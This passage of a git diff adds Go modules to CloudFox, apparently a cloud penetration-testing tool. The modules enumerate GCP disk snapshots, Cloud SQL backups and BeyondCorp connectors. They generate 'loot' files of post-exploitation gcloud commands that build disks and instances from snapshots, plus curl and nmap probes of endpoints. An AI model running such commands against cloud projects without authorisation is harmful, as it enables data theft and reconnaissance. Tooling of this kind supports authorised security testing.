m.ProjectSnapshots { + all = append(all, snapshots...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *BackupInventoryModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating backups for project: %s", projectID), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // List all disks first (for gap analysis) + m.enumerateDisks(ctx, projectID, computeService, logger) + + // List snapshots + m.enumerateSnapshots(ctx, projectID, computeService, logger) + + // List SQL instances and backups + if sqlService != nil { + m.enumerateSQLBackups(ctx, projectID, sqlService, logger) + } +} + +func (m *BackupInventoryModule) enumerateDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + m.mu.Lock() + m.allDisks[disk.SelfLink] = diskInfo{ + SizeGB: disk.SizeGb, + Zone: m.extractZoneFromURL(zone), + ProjectID: projectID, + Name: disk.Name, + } + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Snapshots.List(projectID) + err := req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + // Determine encryption type and KMS key name + encryptionType := "Google-managed" + kmsKeyName := "" + if snapshot.SnapshotEncryptionKey != nil { + if snapshot.SnapshotEncryptionKey.KmsKeyName != "" { + encryptionType = "CMEK" + kmsKeyName = snapshot.SnapshotEncryptionKey.KmsKeyName + } else if snapshot.SnapshotEncryptionKey.RawKey != "" || snapshot.SnapshotEncryptionKey.Sha256 != "" { + encryptionType = "CSEK" + } + } + + snap := ComputeSnapshot{ + ProjectID: projectID, + Name: snapshot.Name, + SourceDisk: snapshot.SourceDisk, + Status: snapshot.Status, + DiskSizeGB: snapshot.DiskSizeGb, + StorageBytes: snapshot.StorageBytes, + CreationTime: snapshot.CreationTimestamp, + StorageLocats: snapshot.StorageLocations, + AutoCreated: snapshot.AutoCreated, + SnapshotType: snapshot.SnapshotType, + EncryptionType: encryptionType, + KMSKeyName: kmsKeyName, + } + + // Get IAM policy for this snapshot + iamPolicy, iamErr := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + snap.IAMBindings = append(snap.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + snap.PublicAccess = true + } + } + } + } + + m.mu.Lock() + m.ProjectSnapshots[projectID] = append(m.ProjectSnapshots[projectID], snap) + m.disksWithBackups[snapshot.SourceDisk] = true + + // Add post-exploit commands for snapshots + if m.LootMap[projectID] != nil { + if lootFile := m.LootMap[projectID]["backup-inventory-commands"]; lootFile != nil { + // Determine a zone from storage locations or use a default + zone := "us-central1-a" + if len(snapshot.StorageLocations) > 0 { + zone = snapshot.StorageLocations[0] + "-a" + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# SNAPSHOT: %s (Source: %s, Size: %dGB)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Create a disk from this snapshot\n"+ + "gcloud compute disks create disk-from-%s \\\n"+ + " --project=%s \\\n"+ + " --zone=%s \\\n"+ + " --source-snapshot=%s\n\n"+ + "# Create an instance using a disk from this snapshot\n"+ + "gcloud compute instances create instance-from-%s \\\n"+ + " --project=%s \\\n"+ + " --zone=%s \\\n"+ + " --disk=name=disk-from-%s,boot=yes\n\n", + snapshot.Name, m.extractDiskName(snapshot.SourceDisk), snapshot.DiskSizeGb, + snapshot.Name, projectID, zone, snapshot.Name, + snapshot.Name, projectID, zone, snapshot.Name, + ) + } + } + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate snapshots in project %s", projectID)) + } + + // Track protected resources from snapshots + m.trackSnapshotProtection(projectID) +} + +func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { + m.mu.Lock() + projectSnapshots := m.ProjectSnapshots[projectID] + m.mu.Unlock() + + // Group snapshots by source disk + diskSnapshots := make(map[string][]ComputeSnapshot) + for _, snap := range projectSnapshots { + diskSnapshots[snap.SourceDisk] = append(diskSnapshots[snap.SourceDisk], snap) + } + + m.mu.Lock() + defer m.mu.Unlock() + + for diskURL, snaps := range diskSnapshots { + // Find latest snapshot + var latestTime time.Time + var latestSnap ComputeSnapshot + for _, snap := range snaps { + t, err := time.Parse(time.RFC3339, snap.CreationTime) + if err == nil && t.After(latestTime) { + latestTime = t + latestSnap = snap + } + } + + diskInfo := m.allDisks[diskURL] + backupStatus := latestSnap.Status + + // Calculate age of last backup + if !latestTime.IsZero() { + age := time.Since(latestTime) + if age > 7*24*time.Hour { + backupStatus = "STALE" + } else { + backupStatus = "CURRENT" + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: m.extractDiskName(diskURL), + ResourceType: "compute-disk", + Location: diskInfo.Zone, + SizeGB: diskInfo.SizeGB, + Protected: true, + BackupType: "snapshot", + LastBackup: latestSnap.CreationTime, + BackupCount: len(snaps), + BackupStatus: backupStatus, + BackupLocation: strings.Join(latestSnap.StorageLocats, ","), + } + + m.ProjectResources[projectID] = append(m.ProjectResources[projectID], resource) + } +} + +func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + m.mu.Lock() + m.allSQLInstances[instance.Name] = sqlInstanceInfo{ + ProjectID: projectID, + Region: instance.Region, + } + m.mu.Unlock() + + // Check backup configuration + backupEnabled := false + pitrEnabled := false + var retentionDays int + var backupStartTime string + + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backupEnabled = instance.Settings.BackupConfiguration.Enabled + pitrEnabled = instance.Settings.BackupConfiguration.PointInTimeRecoveryEnabled + retentionDays = int(instance.Settings.BackupConfiguration.TransactionLogRetentionDays) + backupStartTime = instance.Settings.BackupConfiguration.StartTime + } + + if backupEnabled { + m.mu.Lock() + m.sqlWithBackups[instance.Name] = true + m.mu.Unlock() + + // List actual backups for this instance + backups, err := sqlService.BackupRuns.List(projectID, instance.Name).Do() + if err != nil { + continue + } + + var latestBackupTime string + var latestStatus string + var latestLocation string + backupCount := 0 + + for _, backup := range backups.Items { + backupCount++ + if latestBackupTime == "" || backup.StartTime > latestBackupTime { + latestBackupTime = backup.StartTime + latestStatus = backup.Status + latestLocation = backup.Location + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: instance.Name, + ResourceType: "cloudsql-instance", + Location: instance.Region, + Protected: true, + BackupType: "automated", + Schedule: fmt.Sprintf("Daily at %s", backupStartTime), + RetentionDays: retentionDays, + LastBackup: latestBackupTime, + BackupCount: backupCount, + BackupStatus: latestStatus, + PITREnabled: pitrEnabled, + BackupLocation: latestLocation, + } + + m.mu.Lock() + m.ProjectResources[projectID] = append(m.ProjectResources[projectID], resource) + m.mu.Unlock() + } + } +} + +// ------------------------------ +// Gap Analysis +// ------------------------------ +func (m *BackupInventoryModule) identifyUnprotectedResources() { + m.mu.Lock() + defer m.mu.Unlock() + + // Find disks without snapshots + for diskURL, info := range m.allDisks { + if !m.disksWithBackups[diskURL] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: info.Name, + ResourceType: "compute-disk", + Location: info.Zone, + SizeGB: info.SizeGB, + Protected: false, + BackupType: "none", + } + + m.ProjectResources[info.ProjectID] = append(m.ProjectResources[info.ProjectID], resource) + + // Add to loot (ensure project loot is initialized) + if m.LootMap[info.ProjectID] == nil { + m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) + m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + // No loot commands for unprotected disks - these are informational only + } + } + + // Find SQL instances without backups + for instanceName, info := range m.allSQLInstances { + if !m.sqlWithBackups[instanceName] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: instanceName, + ResourceType: "cloudsql-instance", + Location: info.Region, + Protected: false, + BackupType: "none", + } + + m.ProjectResources[info.ProjectID] = append(m.ProjectResources[info.ProjectID], resource) + + // Add to loot (ensure project loot is initialized) + if m.LootMap[info.ProjectID] == nil { + m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) + m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + // No loot commands for unprotected SQL instances - these are informational only + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *BackupInventoryModule) extractDiskName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *BackupInventoryModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *BackupInventoryModule) extractRegionFromZone(zone string) string { + if zone == "" { + return "" + } + // Zone format: us-central1-a -> Region: us-central1 + parts := strings.Split(zone, "-") + if len(parts) >= 2 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BackupInventoryModule) getResourcesHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Size (GB)", + "Protected", + "Backup Type", + "Schedule", + "Retention", + "Last Backup", + "Count", + "Status", + "PITR", + } +} + +func (m *BackupInventoryModule) getSnapshotsHeader() []string { + return []string{ + "Project", + "Snapshot", + "Source Disk", + "Size (GB)", + "Created", + "Status", + "Type", + "Auto Created", + "Locations", + "Encryption", + "IAM Binding Role", + "IAM Binding Principal", + "Public", + } +} + +func (m *BackupInventoryModule) resourcesToTableBody(resources []BackupResource) [][]string { + var body [][]string + for _, r := range resources { + protectedStr := "No" + if r.Protected { + protectedStr = "Yes" + } + + pitrStr := "No" + if r.PITREnabled { + pitrStr = "Yes" + } + + retentionStr := "" + if r.RetentionDays > 0 { + retentionStr = fmt.Sprintf("%d days", r.RetentionDays) + } + + sizeStr := "" + if r.SizeGB > 0 { + sizeStr = fmt.Sprintf("%d", r.SizeGB) + } + + countStr := "" + if r.BackupCount > 0 { + countStr = fmt.Sprintf("%d", r.BackupCount) + } + + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.Name, + r.ResourceType, + r.Location, + sizeStr, + protectedStr, + r.BackupType, + r.Schedule, + retentionStr, + r.LastBackup, + countStr, + r.BackupStatus, + pitrStr, + }) + } + return body +} + +func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot) [][]string { + var body [][]string + for _, s := range snapshots { + autoCreatedStr := "No" + if s.AutoCreated { + autoCreatedStr = "Yes" + } + + publicAccess := "No" + if s.PublicAccess { + publicAccess = "Yes" + } + + // Format encryption - show KMS key name if CMEK + encryptionDisplay := s.EncryptionType + if s.EncryptionType == "CMEK" && s.KMSKeyName != "" { + // Extract just the key name from the full path for display + // Format: projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY + keyParts := strings.Split(s.KMSKeyName, "/") + if len(keyParts) >= 2 { + encryptionDisplay = fmt.Sprintf("CMEK (%s)", keyParts[len(keyParts)-1]) + } + } + + // If no IAM bindings, still show the snapshot + if len(s.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + encryptionDisplay, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range s.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + encryptionDisplay, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BackupInventoryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if resources, ok := m.ProjectResources[projectID]; ok && len(resources) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "backup-inventory", + Header: m.getResourcesHeader(), + Body: m.resourcesToTableBody(resources), + }) + } + + if snapshots, ok := m.ProjectSnapshots[projectID]; ok && len(snapshots) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "backup-snapshots", + Header: m.getSnapshotsHeader(), + Body: m.snapshotsToTableBody(snapshots), + }) + } + + return tableFiles +} + +func (m *BackupInventoryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectResources { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSnapshots { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BackupInventoryOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } +} + +func (m *BackupInventoryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + allSnapshots := m.getAllSnapshots() + + var tables []internal.TableFile + + if len(allResources) > 0 { + tables = append(tables, internal.TableFile{ + Name: "backup-inventory", + Header: m.getResourcesHeader(), + Body: m.resourcesToTableBody(allResources), + }) + } + + if len(allSnapshots) > 0 { + tables = append(tables, internal.TableFile{ + Name: "backup-snapshots", + Header: m.getSnapshotsHeader(), + Body: m.snapshotsToTableBody(allSnapshots), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BackupInventoryOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } +} diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go new file mode 100644 index 00000000..59ec47df --- /dev/null +++ b/gcp/commands/beyondcorp.go @@ -0,0 +1,446 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + beyondcorpservice "github.com/BishopFox/cloudfox/gcp/services/beyondcorpService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBeyondCorpCommand = &cobra.Command{ + Use: globals.GCP_BEYONDCORP_MODULE_NAME, + Aliases: []string{"bc", "zero-trust"}, + Short: "Enumerate BeyondCorp Enterprise configurations", + Long: `Enumerate BeyondCorp Enterprise configurations. + +Features: +- Lists app connectors and connections +- Analyzes connection endpoints +- Identifies configuration issues`, + Run: runGCPBeyondCorpCommand, +} + +type BeyondCorpModule struct { + gcpinternal.BaseGCPModule + ProjectAppConnectors map[string][]beyondcorpservice.AppConnectorInfo // projectID -> connectors + ProjectAppConnections map[string][]beyondcorpservice.AppConnectionInfo // projectID -> connections + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type BeyondCorpOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BeyondCorpOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BeyondCorpOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBeyondCorpCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BEYONDCORP_MODULE_NAME) + if err != nil { + return + } + + module := &BeyondCorpModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAppConnectors: make(map[string][]beyondcorpservice.AppConnectorInfo), + ProjectAppConnections: make(map[string][]beyondcorpservice.AppConnectionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BEYONDCORP_MODULE_NAME, m.processProject) + + allConnectors := m.getAllConnectors() + allConnections := m.getAllConnections() + + totalCount := len(allConnectors) + len(allConnections) + if totalCount == 0 { + logger.InfoM("No BeyondCorp resources found", globals.GCP_BEYONDCORP_MODULE_NAME) + return + } + + // Count public resources + publicConnectorCount := 0 + publicConnectionCount := 0 + for _, connector := range allConnectors { + if connector.PublicAccess { + publicConnectorCount++ + } + } + for _, conn := range allConnections { + if conn.PublicAccess { + publicConnectionCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d connector(s), %d connection(s)", + len(allConnectors), len(allConnections)), + globals.GCP_BEYONDCORP_MODULE_NAME) + + if publicConnectorCount > 0 || publicConnectionCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public connector(s), %d public connection(s)!", + publicConnectorCount, publicConnectionCount), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BeyondCorpModule) getAllConnectors() []beyondcorpservice.AppConnectorInfo { + var all []beyondcorpservice.AppConnectorInfo + for _, connectors := range m.ProjectAppConnectors { + all = append(all, connectors...) + } + return all +} + +func (m *BeyondCorpModule) getAllConnections() []beyondcorpservice.AppConnectionInfo { + var all []beyondcorpservice.AppConnectionInfo + for _, connections := range m.ProjectAppConnections { + all = append(all, connections...) + } + return all +} + +func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BeyondCorp in project: %s", projectID), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + svc := beyondcorpservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["beyondcorp-details"] = &internal.LootFile{ + Name: "beyondcorp-details", + Contents: "# BeyondCorp Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get app connectors + connectors, err := svc.ListAppConnectors(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BEYONDCORP_MODULE_NAME, + fmt.Sprintf("Could not list app connectors in project %s", projectID)) + } + m.mu.Lock() + m.ProjectAppConnectors[projectID] = connectors + for _, connector := range connectors { + m.addConnectorToLoot(projectID, connector) + } + m.mu.Unlock() + + // Get app connections + connections, err := svc.ListAppConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BEYONDCORP_MODULE_NAME, + fmt.Sprintf("Could not list app connections in project %s", projectID)) + } + m.mu.Lock() + m.ProjectAppConnections[projectID] = connections + for _, conn := range connections { + m.addConnectionToLoot(projectID, conn) + } + m.mu.Unlock() +} + +func (m *BeyondCorpModule) addConnectionToLoot(projectID string, conn beyondcorpservice.AppConnectionInfo) { + lootFile := m.LootMap[projectID]["beyondcorp-details"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CONNECTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Endpoint: %s\n"+ + "# Gateway: %s\n"+ + "# Connectors: %s\n", + conn.Name, conn.ProjectID, conn.Location, conn.State, + conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe this app connection: +gcloud beta beyondcorp app connections describe %s --location=%s --project=%s + +# List IAM policy for this connection: +gcloud beta beyondcorp app connections get-iam-policy %s --location=%s --project=%s + +# List all app connectors in the project: +gcloud beta beyondcorp app connectors list --location=%s --project=%s + +# List all app connections in the project: +gcloud beta beyondcorp app connections list --location=%s --project=%s + +`, conn.Name, conn.Location, conn.ProjectID, + conn.Name, conn.Location, conn.ProjectID, + conn.Location, conn.ProjectID, + conn.Location, conn.ProjectID) + + // Exploitation commands + if conn.ApplicationEndpoint != "" { + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Test connectivity to application endpoint:\n"+ + "curl -v %s\n\n"+ + "# Scan endpoint for open ports (if IP-based):\n"+ + "nmap -sV %s\n\n", + conn.ApplicationEndpoint, conn.ApplicationEndpoint) + } + + if conn.PublicAccess { + lootFile.Contents += "# [FINDING] This connection has PUBLIC access!\n" + + "# Check IAM bindings for allUsers/allAuthenticatedUsers\n\n" + } +} + +func (m *BeyondCorpModule) addConnectorToLoot(projectID string, connector beyondcorpservice.AppConnectorInfo) { + lootFile := m.LootMap[projectID]["beyondcorp-details"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CONNECTOR: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n", + connector.Name, connector.ProjectID, connector.Location, + connector.State, connector.PrincipalInfo) + + lootFile.Contents += fmt.Sprintf(` +# Describe this connector: +gcloud beta beyondcorp app connectors describe %s --location=%s --project=%s + +# Get IAM policy for this connector: +gcloud beta beyondcorp app connectors get-iam-policy %s --location=%s --project=%s + +`, connector.Name, connector.Location, connector.ProjectID, + connector.Name, connector.Location, connector.ProjectID) + + if connector.PublicAccess { + lootFile.Contents += "# [FINDING] This connector has PUBLIC access!\n\n" + } +} + +func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BeyondCorpModule) getConnectorsHeader() []string { + return []string{"Project", "Name", "Location", "State", "Service Account", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BeyondCorpModule) getConnectionsHeader() []string { + return []string{"Project", "Name", "Location", "State", "Endpoint", "Gateway", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BeyondCorpModule) connectorsToTableBody(connectors []beyondcorpservice.AppConnectorInfo) [][]string { + var body [][]string + for _, connector := range connectors { + publicAccess := "No" + if connector.PublicAccess { + publicAccess = "Yes" + } + + if len(connector.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range connector.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BeyondCorpModule) connectionsToTableBody(connections []beyondcorpservice.AppConnectionInfo) [][]string { + var body [][]string + for _, conn := range connections { + publicAccess := "No" + if conn.PublicAccess { + publicAccess = "Yes" + } + + if len(conn.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range conn.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BeyondCorpModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if connectors, ok := m.ProjectAppConnectors[projectID]; ok && len(connectors) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: m.getConnectorsHeader(), + Body: m.connectorsToTableBody(connectors), + }) + } + + if connections, ok := m.ProjectAppConnections[projectID]; ok && len(connections) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "beyondcorp-connections", + Header: m.getConnectionsHeader(), + Body: m.connectionsToTableBody(connections), + }) + } + + return tableFiles +} + +func (m *BeyondCorpModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectAppConnectors { + projectIDs[projectID] = true + } + for projectID := range m.ProjectAppConnections { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BeyondCorpOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } +} + +func (m *BeyondCorpModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allConnectors := m.getAllConnectors() + allConnections := m.getAllConnections() + + var tables []internal.TableFile + + if len(allConnectors) > 0 { + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: m.getConnectorsHeader(), + Body: m.connectorsToTableBody(allConnectors), + }) + } + + if len(allConnections) > 0 { + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connections", + Header: m.getConnectionsHeader(), + Body: m.connectionsToTableBody(allConnections), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BeyondCorpOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } +} diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 01b67fd7..d7b211a5 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -1,134 +1,484 @@ package commands import ( 